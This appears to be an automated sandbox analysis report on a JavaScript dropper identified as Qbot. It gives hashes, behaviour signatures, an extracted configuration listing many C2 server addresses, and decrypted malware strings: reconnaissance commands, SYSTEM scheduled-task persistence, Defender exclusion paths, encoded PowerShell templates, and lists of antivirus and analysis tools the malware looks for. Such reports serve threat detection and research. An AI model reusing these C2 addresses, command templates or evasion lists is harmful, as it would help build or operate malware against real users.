Windows Analysis Report
ProjectFunding_450726_Jun01.js

Overview

General Information

Sample Name: ProjectFunding_450726_Jun01.js
Analysis ID: 880006
MD5: a657553449746c482dacfe3b19119b7a
SHA1: 630b815d443f8f7ef7e4c4c7c100de1cd8a7ed53
SHA256: 44e029dd6210c4906a82e1f16dd5ebed434efd225dafb92fc560e6ff6d1ee948
Tags: js

Detection

Qbot
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign process
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Name: Qbot (aliases: QakBot, qbot)
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

AV Detection

Source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Qbot {"Bot id": "obama266", "Campaign": "1685611378", "Version": "404.1346", "C2 list": ["24.234.220.88:990", "70.28.50.223:2078", "96.56.197.26:2083", "103.123.223.133:443", "83.249.198.100:2222", "199.27.66.213:443", "90.104.151.37:2222", "94.204.202.106:443", "72.205.104.134:443", "65.95.141.84:2222", "70.28.50.223:2078", "82.131.141.209:443", "77.126.99.230:443", "71.38.155.217:443", "205.237.67.69:995", "84.215.202.8:443", "24.234.220.88:465", "76.178.148.107:2222", "116.74.163.130:443", "70.28.50.223:2087", "147.147.30.126:2222", "173.88.135.179:443", "103.140.174.20:2222", "77.86.98.236:443", "92.149.250.113:2222", "96.87.28.170:2222", "86.168.210.41:443", "176.142.207.63:443", "12.172.173.82:32101", "86.132.236.117:443", "70.50.83.216:2222", "161.142.103.187:995", "45.62.70.33:443", "12.172.173.82:465", "178.175.187.254:443", "83.110.223.61:443", "105.184.209.194:995", "41.186.88.38:443", "102.156.10.183:443", "27.109.19.90:2078", "47.205.25.170:443", "12.172.173.82:993", "76.170.252.153:995", "69.242.31.249:443", "24.234.220.88:995", "125.99.69.178:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "124.122.47.148:443", "81.229.117.95:2222", "98.145.23.67:443", "114.143.176.236:443", "103.144.201.48:2078", "122.186.210.254:443", "69.160.121.6:61201", "12.172.173.82:21", "72.253.126.216:443", "75.109.111.89:443", "76.86.31.59:443", "116.120.145.170:995", "12.172.173.82:50001", "81.101.185.146:443", "201.244.108.183:995", "68.203.69.96:443", "103.139.242.6:443", "103.42.86.42:995", "85.61.165.153:2222", "76.16.49.134:443", "125.99.76.102:443", "184.182.66.109:443", "70.28.50.223:32100", "50.68.204.71:993", "85.57.212.13:3389", "41.227.190.59:443", "70.28.50.223:3389", "31.53.29.235:2222", "89.79.229.50:443", "50.68.186.195:443", "47.199.241.39:443", "93.147.235.8:443", "75.141.227.169:443", "45.243.142.31:995", 
"79.92.15.6:443", "85.104.105.67:443", "89.129.109.27:2222", "86.176.83.44:2222", "24.234.220.88:993", "89.32.156.5:995", "12.172.173.82:22", "103.101.203.177:443", "70.28.50.223:2083", "98.187.21.2:443", "70.49.205.198:2222", "96.56.197.26:2222", "92.9.45.20:2222", "86.195.14.72:2222", "172.115.17.50:443", "100.4.163.158:2222", "80.12.88.148:2222", "213.64.33.92:2222", "113.11.92.30:443", "78.192.109.105:2222", "47.34.30.133:443", "122.184.143.86:443", "198.2.51.242:993", "165.120.169.171:2222", "88.126.94.4:50000", "82.125.44.236:2222", "117.195.17.148:993", "147.219.4.194:443", "80.167.196.79:443", "92.154.17.149:2222", "184.181.75.148:443", "95.45.50.93:2222", "84.35.26.14:995", "201.143.215.69:443", "12.172.173.82:2087", "50.68.204.71:443", "64.121.161.102:443"]}
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netstat -nao
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: runas
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ipconfig /all
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net localgroup
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: nltest /domain_trusts /all_trusts
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Microsoft
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELF_TEST_1
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: p%08x
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self test FAILED!!!
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self test OK.
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: /t5
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: whoami /all
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: route print
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .lnk
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: arp -a
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net share
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe /c set
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self check
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %u;%u;%u;
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ProfileImagePath
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: at.exe %u:%u "%s" /I
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ProgramData
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self check ok!
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: qwinsta
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net view
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Component_08
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Start screenshot
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: schtasks.exe /Delete /F /TN %u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: appidapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\ProgramData
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Component_07
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe -encodedCommand %S
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe -encodedCommand
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SystemRoot
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cscript.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/jpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LocalLow
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: displayName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shlwapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CommandLine
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernel32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: 1234567890
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wbj.go
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_DiskDrive
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: System32
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Name
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WRSA.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SpyNetReporting
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: FALSE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhookx.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Packages
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: application/x-shockwave-flash
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: RepUx.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Winsta0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avp.exe;kavtray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: root\SecurityCenter2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MsMpEng.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: userenv.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: csc_ui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \\.\pipe\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: pstorec.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: NTUSER.DAT
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: from
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: gdi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: setupapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_Processor
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: iphlpapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CrAmTray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_ComputerSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: user32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \sf2.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: egui.exe;ekrn.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Software\Microsoft
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %S.%06d
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bcrypt.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM AntiVirusProduct
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wtsapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shell32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: TRUE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Bios
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: */*
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: https
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s\system32\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Process
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: APPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: select
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .cfg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Product
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WQL
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wininet.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Create
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Initializing database...
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: winsta0\default
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dat
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: next
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fmon.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vbs
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SysWOW64
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mpr.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/gif
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: open
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: */*
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: https
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s\system32\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Process
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: APPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: select
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .cfg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Product
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WQL
